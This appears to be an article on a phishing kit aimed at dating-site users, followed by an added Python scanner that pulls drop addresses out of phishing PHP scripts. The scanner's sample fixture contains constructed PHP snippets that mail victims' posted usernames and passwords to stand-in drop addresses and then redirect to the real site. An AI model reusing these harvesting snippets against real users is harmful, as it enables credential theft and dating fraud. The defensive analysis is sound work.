Criminals are running phishing campaigns against online dating sites, a shift in focus from traditional phishing targets such as banks and other financial institutions. That’s according to Netcraft, a Bath-based internet services company. The most recent attack used a single compromised website to host hundreds of fraudulent PHP scripts, most of which were designed to steal usernames and passwords from users of the most popular dating sites.
The online dating sites targeted by the latest attack include match.com, Christian Mingle, POF (PlentyOfFish), eHarmony, Chemistry.com, SeniorPeopleMeet, Zoosk and Lavalife, among others. Only eight of the 862 fraudulent scripts on the server targeted banks.
According to Netcraft it is likely that the criminals who steal accounts on these sites will go on to use them to commit online dating fraud — many dating sites only allow messages to be exchanged with other users after a subscription fee has been paid; by compromising existing paid accounts, the fraudsters can reduce their traceability by avoiding the need to make payments.
Online dating fraud is often carried out by criminal gangs who use fake profiles to trick victims into developing long-distance relationships. Once the fraudsters have gathered enough sympathy and trust from a victim, they exploit it by claiming they need money to pay for travel costs, or to afford medical treatment for a family member. After the money has been stolen, the criminals make up further reasons why they need more. In some cases, the fraudsters blackmail their victim into sending money: if the victim has sent any explicit photos or videos to the criminals, they may threaten to send them to the victim’s friends and family.
The amount of money involved in these scams can be considerable. While many online dating sites take measures to identify fake profiles, phishing for genuine, established accounts gives fraudsters the edge. If a legitimate profile has been in active use for several months without cause for concern, then compromising it allows the fraudster to benefit not only from the plausible appearance of the profile but also from taking over several ongoing conversations. The real owner of the hijacked account will have already done the hard bit by establishing dialogues with other members of the site, possibly gaining enough trust to allow the fraudsters to strike immediately with success.
The latest attacks make use of a phishing kit which contains hundreds of PHP scripts, configured to send stolen credentials to more than 300 distinct email addresses. More than half of these addresses used the yahoo.com domain, while gmail.com was the next most common choice. Although most of the fraudsters’ scripts target online dating sites, some of them are also designed to steal credentials from users of these webmail platforms. Email accounts are often shut down after the provider notices they have been used for fraudulent purposes, so ensuring a fresh supply of compromised accounts gives fraudsters the opportunity to send even more phishing emails before the accounts get closed.
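The kit layout described above lends itself to mechanical triage once the scripts have been recovered from the compromised host. The following is an added example written for this page, not Netcraft’s tooling or anything from the kit itself: a small Python scanner that takes a set of PHP scripts, pulls out the recipient addresses handed to PHP’s mail(), and tallies them by domain, by targeted brand (taken from the directory name) and by which scripts share a drop address. The kit contents below are constructed stand-ins; the brand directory names and the two recipient patterns (a quoted literal, or a variable assigned a quoted literal earlier in the file) are assumptions about how such scripts are written, and a kit that concatenates or base64-decodes the recipient would slip past this regex pass.

```python
import re
from collections import Counter

# Constructed sample kit (filename -> PHP source). Invented stand-ins for
# credential-harvesting scripts, not the real kit described in the article.
SAMPLE_KIT = {
    "match/login.php": '''<?php
$to = "dropbox1@yahoo.com";
$msg = "user: ".$_POST['email']." pass: ".$_POST['password'];
mail($to, "match result", $msg);
header("Location: https://www.match.com/");
''',
    "pof/post.php": '''<?php
$recipient = "harvest.pof@gmail.com";
mail($recipient, "pof login", "u=".$_POST['username']."&p=".$_POST['password']);
mail("backup.drop@yahoo.com", "pof login", "u=".$_POST['username']);
''',
    "bank/verify.php": '''<?php
mail('bankdrop@yahoo.com', 'bank', print_r($_POST, true));
''',
    "yahoo/login.php": '''<?php
$to = "dropbox1@yahoo.com"; // same drop address reused across scripts
mail($to, "webmail", $_POST['login'].':'.$_POST['passwd']);
''',
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Variable assigned a quoted string literal:  $to = "addr";
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*(["\'])(.*?)\2\s*;')
# First argument of mail(): a quoted literal, or a bare $variable.
MAIL_RE = re.compile(r'\bmail\s*\(\s*(?:(["\'])(.*?)\1|\$(\w+))')


def extract_exfil_addresses(php_source):
    """Return the set of e-mail addresses a script passes to mail() as recipient."""
    assigned = {name: value for name, _quote, value in ASSIGN_RE.findall(php_source)}
    found = set()
    for _quote, literal, var in MAIL_RE.findall(php_source):
        # Resolve $var to its literal assignment; unknown/computed values are skipped.
        target = literal if literal else assigned.get(var, "")
        found.update(EMAIL_RE.findall(target))
    return found


def summarize_kit(kit):
    """Per-script addresses, the distinct drop addresses, and a tally of their domains."""
    per_script = {name: extract_exfil_addresses(src) for name, src in kit.items()}
    addresses = set().union(*per_script.values())
    domains = Counter(addr.rsplit("@", 1)[1].lower() for addr in addresses)
    return per_script, addresses, domains


def shared_addresses(per_script):
    """Drop addresses used by more than one script (a link between lures)."""
    users = {}
    for script, addrs in per_script.items():
        for addr in addrs:
            users.setdefault(addr, set()).add(script)
    return {addr: scripts for addr, scripts in users.items() if len(scripts) > 1}


def count_by_target(kit):
    """Scripts per targeted brand, assuming the kit is laid out as <brand>/<file>.php."""
    return Counter(name.split("/", 1)[0] for name in kit)


if __name__ == "__main__":
    per_script, addresses, domains = summarize_kit(SAMPLE_KIT)
    print(f"{len(addresses)} distinct drop addresses across {len(SAMPLE_KIT)} scripts")
    for domain, n in domains.most_common():
        print(f"  {domain}: {n}")
    for addr, scripts in shared_addresses(per_script).items():
        print(f"shared: {addr} <- {sorted(scripts)}")
    print("targets:", dict(count_by_target(SAMPLE_KIT)))
```

Run against a real recovered kit, the domain tally is what supports a statement like "more than half of the addresses used yahoo.com", and the shared-address view is the quickest way to tell whether hundreds of scripts belong to one operator or several; addresses that the regex cannot resolve should be reviewed by hand rather than assumed absent.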